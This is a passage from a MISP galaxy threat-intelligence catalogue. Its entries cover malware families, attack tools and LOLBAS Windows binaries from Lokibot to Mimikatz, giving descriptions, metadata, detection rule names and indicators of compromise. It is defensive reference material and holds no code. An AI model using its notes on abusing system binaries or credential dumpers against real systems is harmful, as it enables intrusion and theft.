UUID 4fead65c-499d-4f44-8879-2c35b24dac68
which can be used as unique global reference for Lokibot
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0447 |
source | MITRE |
tags | ['84615fe0-c2a5-4e07-8957-78ebc29b4635'] |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
LookBack
LookBack is a remote access trojan written in C++ that was used against at least three US utility companies in July 2019. The TALONITE activity group has been observed using LookBack.[Proofpoint LookBack Malware Aug 2019][Dragos TALONITE][Dragos Threat Report 2020]
Internal MISP references
UUID bfd2a077-5000-4500-82c4-5c85fb98dd5a
which can be used as unique global reference for LookBack
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0582 |
source | MITRE |
type | ['malware'] |
LostMyPassword
LostMyPassword is a tool used to recover passwords from Windows systems.[U.S. CISA Understanding LockBit June 2023]
Internal MISP references
UUID 41041d5d-0866-4a57-92b7-d075d8b344ad
which can be used as unique global reference for LostMyPassword
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5035 |
source | Tidal Cyber |
tags | ['e1af18e3-3224-4e4c-9d0f-533768474508', 'dcd6d78a-50e9-4fbd-a36a-06fbe6b7b40c', 'ed2b3f47-3e07-4019-a9bf-ec9d87f28c96', 'af5e9be5-b86e-47af-91dd-966a5e34a186', '758c3085-2f79-40a8-ab95-f8a684737927', '2185ed93-7e1c-4553-9452-c8411b5dca93', '904ad11a-20ca-479c-ad72-74bd5d9dc7e4', '1dc8fd1e-0737-405a-98a1-111dd557f1b5', '35e694ec-5133-46e3-b7e1-5831867c3b55', '15787198-6c8b-4f79-bf50-258d55072fee', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
type | ['tool'] |
Related clusters
To see the related clusters, click here.
LoudMiner
LoudMiner is a cryptocurrency miner which uses virtualization software to siphon system resources. The miner has been bundled with pirated copies of Virtual Studio Technology (VST) for Windows and macOS.[ESET LoudMiner June 2019]
Internal MISP references
UUID f503535b-406c-4e24-8123-0e22fec995bb
which can be used as unique global reference for LoudMiner
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['macOS', 'Windows'] |
software_attack_id | S0451 |
source | MITRE |
tags | ['a2e000da-8181-4327-bacd-32013dbd3654'] |
type | ['malware'] |
LOWBALL
LOWBALL is malware used by admin@338. It was used in August 2015 in email messages targeting Hong Kong-based media organizations. [FireEye admin@338]
Internal MISP references
UUID fce1117a-e699-4aef-b1fc-04c3967acc33
which can be used as unique global reference for LOWBALL
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0042 |
source | MITRE |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
Lslsass
Lslsass is a publicly-available tool that can dump active logon session password hashes from the lsass process. [Mandiant APT1]
Internal MISP references
UUID 37a5ae23-3da5-4cbc-a21a-a7ef98a3b7cc
which can be used as unique global reference for Lslsass
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0121 |
source | MITRE |
tags | ['4d767e87-4cf6-438a-927a-43d2d0beaab7'] |
type | ['tool'] |
Related clusters
To see the related clusters, click here.
Lucifer
Lucifer is a crypto miner and DDoS hybrid malware that leverages well-known exploits to spread laterally on Windows platforms.[Unit 42 Lucifer June 2020]
Internal MISP references
UUID 723d9a27-74fd-4333-a8db-63df2a8b4dd4
which can be used as unique global reference for Lucifer
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0532 |
source | MITRE |
type | ['malware'] |
Lurid
Lurid is a malware family that has been used by several groups, including PittyTiger, in targeted attacks as far back as 2006. [Villeneuve 2014] [Villeneuve 2011]
Internal MISP references
UUID 0cc9e24b-d458-4782-a332-4e4fd68c057b
which can be used as unique global reference for Lurid
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0010 |
source | MITRE |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
Machete
Machete is a cyber espionage toolset used by Machete. It is a Python-based backdoor targeting Windows machines that was first observed in 2010.[ESET Machete July 2019][Securelist Machete Aug 2014][360 Machete Sep 2020]
Internal MISP references
UUID be8a1630-9562-41ad-a621-65989f961a10
which can be used as unique global reference for Machete
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0409 |
source | MITRE |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
MacMa
MacMa is a macOS-based backdoor with a large set of functionalities to control and exfiltrate files from a compromised computer. MacMa has been observed in the wild since November 2021.[ESET DazzleSpy Jan 2022]
Internal MISP references
UUID 7e5a643d-ebfd-4ec6-9fdc-79d6f47fafdb
which can be used as unique global reference for MacMa
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['macOS'] |
software_attack_id | S1016 |
source | MITRE |
type | ['malware'] |
macOS.OSAMiner
macOS.OSAMiner is a Monero mining trojan that was first observed in 2018; security researchers assessed macOS.OSAMiner may have been circulating since at least 2015. macOS.OSAMiner is known for embedding one run-only AppleScript into another, which helped the malware evade full analysis for five years due to a lack of Apple event (AEVT) analysis tools.[SentinelLabs reversing run-only applescripts 2021][VMRay OSAMiner dynamic analysis 2021]
Internal MISP references
UUID 74feb557-21bc-40fb-8ab5-45d3af84c380
which can be used as unique global reference for macOS.OSAMiner
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['macOS'] |
software_attack_id | S1048 |
source | MITRE |
type | ['malware'] |
MacSpy
MacSpy is a malware-as-a-service offered on the darkweb [objsee mac malware 2017].
Internal MISP references
UUID e5e67c67-e658-45b5-850b-044312be4258
which can be used as unique global reference for MacSpy
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['macOS'] |
software_attack_id | S0282 |
source | MITRE |
type | ['malware'] |
Mafalda
Mafalda is a flexible interactive implant that has been used by Metador. Security researchers assess the Mafalda name may be inspired by an Argentinian cartoon character that has been popular as a means of political commentary since the 1960s. [SentinelLabs Metador Sept 2022]
Internal MISP references
UUID 7506616c-b808-54fb-9982-072a0dcf8a04
which can be used as unique global reference for Mafalda
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S1060 |
source | MITRE |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
MailSniper
MailSniper is a penetration testing tool for searching through email in a Microsoft Exchange environment for specific terms (passwords, insider intel, network architecture information, etc.). It can be used by a non-administrative user to search their own email, or by an Exchange administrator to search the mailboxes of every user in a domain.[GitHub MailSniper]
Internal MISP references
UUID d762974a-ca7e-45ee-bc1d-f5218bf46c84
which can be used as unique global reference for MailSniper
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Office 365', 'Windows', 'Azure AD'] |
software_attack_id | S0413 |
source | MITRE |
tags | ['15f2277a-a17e-4d85-8acd-480bf84f16b4', 'c9c73000-30a5-4a16-8c8b-79169f9c24aa'] |
type | ['tool'] |
Related clusters
To see the related clusters, click here.
Makecab
This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.
Description: Binary to package existing files into a cabinet (.cab) file
Author: Oddvar Moe
Paths:
* C:\Windows\System32\makecab.exe
* C:\Windows\SysWOW64\makecab.exe
Resources:
* https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f
Detection:
* Sigma: proc_creation_win_susp_alternate_data_streams.yml
* Elastic: defense_evasion_misc_lolbin_connecting_to_the_internet.toml
* IOC: Makecab retrieving files from Internet
* IOC: Makecab storing data into alternate data streams[Makecab.exe - LOLBAS Project]
Internal MISP references
UUID cf7f05a7-4093-4855-b9d9-b93226056aec
which can be used as unique global reference for Makecab
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5123 |
source | Tidal Cyber |
tags | ['758c3085-2f79-40a8-ab95-f8a684737927', 'af5e9be5-b86e-47af-91dd-966a5e34a186', '904ad11a-20ca-479c-ad72-74bd5d9dc7e4', '35e694ec-5133-46e3-b7e1-5831867c3b55', '1dc8fd1e-0737-405a-98a1-111dd557f1b5', '15787198-6c8b-4f79-bf50-258d55072fee', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
type | ['tool'] |
Related clusters
To see the related clusters, click here.
Manage-bde
This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.
Description: Script for managing BitLocker
Author: Oddvar Moe
Paths:
* C:\Windows\System32\manage-bde.wsf
Resources:
* https://gist.github.com/bohops/735edb7494fe1bd1010d67823842b712
* https://twitter.com/bohops/status/980659399495741441
* https://twitter.com/JohnLaTwC/status/1223292479270600706
Detection:
* Sigma: proc_creation_win_lolbin_manage_bde.yml
* IOC: Manage-bde.wsf should not be invoked by a standard user under normal situations[Manage-bde.wsf - LOLBAS Project]
Internal MISP references
UUID 9b6b705e-55ae-4d9e-9c57-baf1358cc324
which can be used as unique global reference for Manage-bde
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5259 |
source | Tidal Cyber |
tags | ['ff10869f-fed4-4f21-b83a-9939e7381d6e', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
type | ['tool'] |
MarkiRAT
MarkiRAT is a remote access Trojan (RAT) compiled with Visual Studio that has been used by Ferocious Kitten since at least 2015.[Kaspersky Ferocious Kitten Jun 2021]
Internal MISP references
UUID 40806539-1496-4a64-b740-66f6a1467f40
which can be used as unique global reference for MarkiRAT
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0652 |
source | MITRE |
tags | ['16b47583-1c54-431f-9f09-759df7b5ddb7'] |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
MASSCAN
According to its GitHub project page, MASSCAN is an "Internet-scale" TCP port scanner. Its usage is similar to that of the popular nmap scanning tool, but it is designed to be operated at a larger scale.[GitHub masscan]
Internal MISP references
UUID 24862f72-a4e0-4a6b-90d7-2465aa86c402
which can be used as unique global reference for MASSCAN
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Linux', 'macOS', 'Windows'] |
software_attack_id | S5282 |
source | Tidal Cyber |
tags | ['e1af18e3-3224-4e4c-9d0f-533768474508', 'cd1b5d44-226e-4405-8985-800492cf2865', 'ed2b3f47-3e07-4019-a9bf-ec9d87f28c96', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
type | ['tool'] |
Related clusters
To see the related clusters, click here.
Matryoshka
Matryoshka is a malware framework used by CopyKittens that consists of a dropper, loader, and RAT. It has multiple versions; v1 was seen in the wild from July 2016 until January 2017. v2 has fewer commands and other minor differences. [ClearSky Wilted Tulip July 2017] [CopyKittens Nov 2015]
Internal MISP references
UUID eeb700ea-2819-46f4-936d-f7592f20dedc
which can be used as unique global reference for Matryoshka
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0167 |
source | MITRE |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
Mavinject
This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.
Description: Used by App-v in Windows
Author: Oddvar Moe
Paths:
* C:\Windows\System32\mavinject.exe
* C:\Windows\SysWOW64\mavinject.exe
Resources:
* https://twitter.com/gN3mes1s/status/941315826107510784
* https://twitter.com/Hexcorn/status/776122138063409152
* https://oddvar.moe/2018/01/14/putting-data-in-alternate-data-streams-and-how-to-execute-it/
Detection:
* Sigma: proc_creation_win_lolbin_mavinject_process_injection.yml
* IOC: mavinject.exe should not run unless APP-v is in use on the workstation[LOLBAS Mavinject]
Internal MISP references
UUID aa472f81-7673-4545-89f9-1dd43cead4f1
which can be used as unique global reference for Mavinject
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5124 |
source | Tidal Cyber |
tags | ['724c3509-ad5e-46a3-a72c-6f3807b13793', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
type | ['tool'] |
Maze
Maze ransomware, previously known as "ChaCha", was discovered in May 2019. In addition to encrypting files on victim machines for impact, Maze operators conduct information stealing campaigns prior to encryption and post the information online to extort affected companies.[FireEye Maze May 2020][McAfee Maze March 2020][Sophos Maze VM September 2020]
Internal MISP references
UUID 3c206491-45c0-4ff7-9f40-45f9aae4de64
which can be used as unique global reference for Maze
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0449 |
source | MITRE |
tags | ['562e535e-19f5-4d6c-81ed-ce2aec544f09', '3c3f9078-5d1e-4c29-a5eb-28f237bbd1ad', '1cc90752-70a3-4a17-b370-e1473a212f79', '286918d5-0b48-4655-9118-907b53de0ee0', 'c5c8f954-1bc0-45d5-9a4f-4385d0a720a1', 'ab64f2d8-8da3-48de-ac66-0fd91d634b22', '5e7433ad-a894-4489-93bc-41e90da90019', 'a2e000da-8181-4327-bacd-32013dbd3654', '7e7b0c67-bb85-4996-a289-da0e792d7172'] |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
MBR Killer
MBR Killer is a wiper malware observed during a May 2023 data theft and wiper campaign and a 2016 attack on Banco de Chile.[The DFIR Report Truebot June 12 2023]
Internal MISP references
UUID fb879c66-92b1-4a43-8df8-987fc3bc1b1b
which can be used as unique global reference for MBR Killer
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5297 |
source | Tidal Cyber |
tags | ['c6e1f516-1a18-4ff9-b563-e6ac8103b104', '2e621fc5-dea4-4cb9-987e-305845986cd3', '2feda37d-5579-4102-a073-aa02e82cb49f'] |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
MCMD
MCMD is a remote access tool that provides remote command shell capability used by Dragonfly 2.0.[Secureworks MCMD July 2019]
Internal MISP references
UUID 939cbe39-5b63-4651-b0c0-85ac39cb9f0e
which can be used as unique global reference for MCMD
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0500 |
source | MITRE |
type | ['tool'] |
Related clusters
To see the related clusters, click here.
MechaFlounder
MechaFlounder is a Python-based remote access tool (RAT) that has been used by APT39. The payload uses a combination of actor-developed code and code snippets freely available online in development communities.[Unit 42 MechaFlounder March 2019]
Internal MISP references
UUID 31cbe3c8-be88-4a4f-891d-04c3bb7ed482
which can be used as unique global reference for MechaFlounder
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0459 |
source | MITRE |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
MedusaLocker Ransomware
MedusaLocker is a ransomware-as-a-service ("RaaS") operation that has been active since September 2019. U.S. cybersecurity authorities indicate that MedusaLocker operators have primarily targeted victims in the healthcare sector, among other unspecified sectors. Initial access for MedusaLocker intrusions originally came via phishing and spam email campaigns, but since 2022 it has typically occurred via exploitation of vulnerable Remote Desktop Protocol devices.[HC3 Analyst Note MedusaLocker Ransomware February 2023]
Malpedia (Research): https://malpedia.caad.fkie.fraunhofer.de/details/win.medusalocker
Malware Bazaar (Samples & IOCs): https://bazaar.abuse.ch/browse/tag/medusalocker/
Internal MISP references
UUID c9e824b2-554b-4f42-b4c3-48e0a841f589
which can be used as unique global reference for MedusaLocker Ransomware
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5022 |
source | Tidal Cyber |
tags | ['562e535e-19f5-4d6c-81ed-ce2aec544f09', '5e7433ad-a894-4489-93bc-41e90da90019', '7e7b0c67-bb85-4996-a289-da0e792d7172'] |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
meek
meek is an open-source Tor plugin that tunnels Tor traffic through HTTPS connections.
Internal MISP references
UUID 6c3bbcae-3217-43c7-b709-5c54bc7636b1
which can be used as unique global reference for meek
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['macOS', 'Linux', 'Windows'] |
software_attack_id | S0175 |
source | MITRE |
tags | ['febea5b6-2ea2-402b-8bec-f3f5b3f73c59'] |
type | ['tool'] |
Related clusters
To see the related clusters, click here.
MegaCortex
MegaCortex is ransomware that first appeared in May 2019. [IBM MegaCortex] MegaCortex has mainly targeted industrial organizations. [FireEye Ransomware Disrupt Industrial Production][FireEye Financial Actors Moving into OT]
Internal MISP references
UUID d8a4a817-2914-47b0-867c-ad8eeb7efd10
which can be used as unique global reference for MegaCortex
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0576 |
source | MITRE |
tags | ['5e7433ad-a894-4489-93bc-41e90da90019', '7e7b0c67-bb85-4996-a289-da0e792d7172'] |
type | ['malware'] |
MEGAsync
A legitimate binary that automates syncing between an endpoint and the MEGA Cloud Drive.[GitHub meganz MEGAsync] Adversaries are known to abuse the tool for data exfiltration purposes.[U.S. CISA BianLian Ransomware May 2023]
Internal MISP references
UUID eed908e5-a0b3-473f-bca4-0d3197af2168
which can be used as unique global reference for MEGAsync
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Linux', 'macOS', 'Windows'] |
software_attack_id | S5005 |
source | Tidal Cyber |
tags | ['c5a258ce-9045-48d9-b254-ec2bf6437bb5', 'cc4ea215-87ce-4351-9579-cf527caf5992', 'd819ae1a-e385-49fd-88d5-f66660729ecb', 'e551ae97-d1b4-484e-9267-89f33829ec2c', 'e1af18e3-3224-4e4c-9d0f-533768474508', '8bf128ad-288b-41bc-904f-093f4fdde745', 'ed2b3f47-3e07-4019-a9bf-ec9d87f28c96', 'af5e9be5-b86e-47af-91dd-966a5e34a186', '758c3085-2f79-40a8-ab95-f8a684737927', '2185ed93-7e1c-4553-9452-c8411b5dca93', '904ad11a-20ca-479c-ad72-74bd5d9dc7e4', '1dc8fd1e-0737-405a-98a1-111dd557f1b5', '35e694ec-5133-46e3-b7e1-5831867c3b55', '15787198-6c8b-4f79-bf50-258d55072fee', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
type | ['tool'] |
Related clusters
To see the related clusters, click here.
Melcoz
Melcoz is a banking trojan family built from the open source tool Remote Access PC. Melcoz was first observed in attacks in Brazil and since 2018 has spread to Chile, Mexico, Spain, and Portugal.[Securelist Brazilian Banking Malware July 2020]
Internal MISP references
UUID aa844e6b-feda-4928-8c6d-c59f7be88da0
which can be used as unique global reference for Melcoz
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0530 |
source | MITRE |
type | ['malware'] |
MESSAGETAP
MESSAGETAP is a data mining malware family deployed by APT41 into telecommunications networks to monitor and save SMS traffic associated with specific phone numbers or IMSI numbers, or containing specific keywords. [FireEye MESSAGETAP October 2019]
Internal MISP references
UUID 15d7e478-349d-42e6-802d-f16302b98319
which can be used as unique global reference for MESSAGETAP
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Linux'] |
software_attack_id | S0443 |
source | MITRE |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
metaMain
metaMain is a backdoor used by Metador to maintain long-term access to compromised machines; it has also been used to decrypt Mafalda into memory.[SentinelLabs Metador Sept 2022][SentinelLabs Metador Technical Appendix Sept 2022]
Internal MISP references
UUID 0a9874bf-4f02-5fab-8ab6-d0f42c6bc71d
which can be used as unique global reference for metaMain
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S1059 |
source | MITRE |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
Metamorfo
Metamorfo is a Latin-American banking trojan operated by a Brazilian cybercrime group that has been active since at least April 2018. The group focuses on targeting banks and cryptocurrency services in Brazil and Mexico.[Medium Metamorfo Apr 2020][ESET Casbaneiro Oct 2019]
Internal MISP references
UUID ca607087-25ad-4a91-af83-608646cccbcb
which can be used as unique global reference for Metamorfo
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0455 |
source | MITRE |
tags | ['f8669b82-2194-49a9-8e20-92e7f9ab0a6f'] |
type | ['malware'] |
Metasploit
The Metasploit Framework is an open-source software project that aids in penetration testing.[Metasploit_Ref] The software is often abused by malicious actors to perform a range of post-exploitation activities.
Internal MISP references
UUID 8d3b1150-8bb3-49a8-8266-7023e3c5e50a
which can be used as unique global reference for Metasploit
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Linux', 'macOS', 'Windows'] |
software_attack_id | S5050 |
source | Tidal Cyber |
tags | ['c6e1f516-1a18-4ff9-b563-e6ac8103b104', '2feda37d-5579-4102-a073-aa02e82cb49f', 'ed2b3f47-3e07-4019-a9bf-ec9d87f28c96', '15787198-6c8b-4f79-bf50-258d55072fee', 'e81ba503-60b0-4b64-8f20-ef93e7783796'] |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
MetaStealer
MetaStealer is an information-stealing malware ("infostealer") designed to harvest passwords, cookies, and other sensitive information from victim systems.[SentinelOne 9 11 2023]
Internal MISP references
UUID e95281ef-a1b1-4da0-b7cc-fa0a9236a4fc
which can be used as unique global reference for MetaStealer
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['macOS'] |
software_attack_id | S5315 |
source | Tidal Cyber |
tags | ['c6e1f516-1a18-4ff9-b563-e6ac8103b104', '2feda37d-5579-4102-a073-aa02e82cb49f'] |
type | ['malware'] |
Meteor
Meteor is a wiper that was used against Iranian government organizations, including Iranian Railways, the Ministry of Roads, and Urban Development systems, in July 2021. Meteor is likely a newer version of similar wipers called Stardust and Comet that were reportedly used by a group called "Indra" since at least 2019 against private companies in Syria.[Check Point Meteor Aug 2021]
Internal MISP references
UUID ee07030e-ff50-404b-ad27-ab999fc1a23a
which can be used as unique global reference for Meteor
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0688 |
source | MITRE |
type | ['malware'] |
Mftrace
This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.
Description: Trace log generation tool for Media Foundation Tools.
Author: Oddvar Moe
Paths:
* C:\Program Files (x86)\Windows Kits\10\bin\10.0.16299.0\x86
* C:\Program Files (x86)\Windows Kits\10\bin\10.0.16299.0\x64
* C:\Program Files (x86)\Windows Kits\10\bin\x86
* C:\Program Files (x86)\Windows Kits\10\bin\x64
Resources:
* https://twitter.com/0rbz_/status/988911181422186496
Detection:
* Sigma: proc_creation_win_lolbin_mftrace.yml[Mftrace.exe - LOLBAS Project]
Internal MISP references
UUID 4184f447-6f74-487b-be08-6330a6b78992
which can be used as unique global reference for Mftrace
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5224 |
source | Tidal Cyber |
tags | ['303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
type | ['tool'] |
Micropsia
Micropsia is a remote access tool written in Delphi.[Talos Micropsia June 2017][Radware Micropsia July 2018]
Internal MISP references
UUID 5879efc1-f122-43ec-a80d-e25aa449594d
which can be used as unique global reference for Micropsia
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0339 |
source | MITRE |
tags | ['16b47583-1c54-431f-9f09-759df7b5ddb7'] |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
Microsoft.NodejsTools.PressAnyKey
This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.
Description: Part of the NodeJS Visual Studio tools.
Author: mr.d0x
Paths:
* C:\Program Files\Microsoft Visual Studio*\Community\Common7\IDE\Extensions\Microsoft\NodeJsTools\NodeJsTools\Microsoft.NodejsTools.PressAnyKey.exe
* C:\Program Files (x86)\Microsoft Visual Studio*\Community\Common7\IDE\Extensions\Microsoft\NodeJsTools\NodeJsTools\Microsoft.NodejsTools.PressAnyKey.exe
Resources:
* https://twitter.com/mrd0x/status/1463526834918854661
Detection:
* Sigma: proc_creation_win_renamed_pressanykey.yml
* Sigma: proc_creation_win_pressanykey_lolbin_execution.yml[Microsoft.NodejsTools.PressAnyKey.exe - LOLBAS Project]
Internal MISP references
UUID 370b00ba-1f91-4375-8a4c-5ca67066f4fd
which can be used as unique global reference for Microsoft.NodejsTools.PressAnyKey
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5225 |
source | Tidal Cyber |
tags | ['eb75bfce-e0d6-41b3-a3f0-df34e6e9b476', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
type | ['tool'] |
Microsoft.Workflow.Compiler
This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.
Description: A utility included with .NET that is capable of compiling and executing C# or VB.net code.
Author: Conor Richard
Paths:
* C:\Windows\Microsoft.Net\Framework64\v4.0.30319\Microsoft.Workflow.Compiler.exe
Resources:
* https://twitter.com/mattifestation/status/1030445200475185154
* https://posts.specterops.io/arbitrary-unsigned-code-execution-vector-in-microsoft-workflow-compiler-exe-3d9294bc5efb
* https://gist.github.com/mattifestation/3e28d391adbd7fe3e0c722a107a25aba#file-workflowcompilerdetectiontests-ps1
* https://gist.github.com/mattifestation/7ba8fc8f724600a9f525714c9cf767fd#file-createcompilerinputxml-ps1
* https://www.forcepoint.com/blog/security-labs/using-c-post-powershell-attacks
* https://www.fortynorthsecurity.com/microsoft-workflow-compiler-exe-veil-and-cobalt-strike/
* https://medium.com/@Bank_Security/undetectable-c-c-reverse-shells-fab4c0ec4f15
Detection:
* Sigma: proc_creation_win_lolbin_workflow_compiler.yml
* Splunk: suspicious_microsoft_workflow_compiler_usage.yml
* Splunk: suspicious_microsoft_workflow_compiler_rename.yml
* Elastic: defense_evasion_unusual_process_network_connection.toml
* Elastic: defense_evasion_network_connection_from_windows_binary.toml
* BlockRule: https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules
* IOC: Microsoft.Workflow.Compiler.exe would not normally be run on workstations.
* IOC: The presence of csc.exe or vbc.exe as child processes of Microsoft.Workflow.Compiler.exe
* IOC: Presence of "<CompilerInput" in a text file.
[Microsoft.Workflow.Compiler.exe - LOLBAS Project]
Internal MISP references
UUID 27bd5fc3-17d9-46fa-84ce-c772736512cd
which can be used as unique global reference for Microsoft.Workflow.Compiler
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5125 |
source | Tidal Cyber |
tags | ['b48e3fa8-25b4-42be-97e7-086068a150c5', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
type | ['tool'] |
Milan
Milan is a backdoor implant based on DanBot that was written in Visual C++ and .NET. Milan has been used by HEXANE since at least June 2020.[ClearSky Siamesekitten August 2021][Kaspersky Lyceum October 2021]
Internal MISP references
UUID 57545dbc-c72a-409d-a373-bc35e25160cd
which can be used as unique global reference for Milan
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S1015 |
source | MITRE |
tags | ['f8669b82-2194-49a9-8e20-92e7f9ab0a6f'] |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
Mimikatz
Mimikatz is a credential dumper capable of obtaining plaintext Windows account logins and passwords, along with many other features that make it useful for testing the security of networks. [Deply Mimikatz] [Adsecurity Mimikatz Guide]
Internal MISP references
UUID b8e7c0b4-49e4-4e8d-9467-b17f305ddf16
which can be used as unique global reference for Mimikatz
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0002 |
source | MITRE |
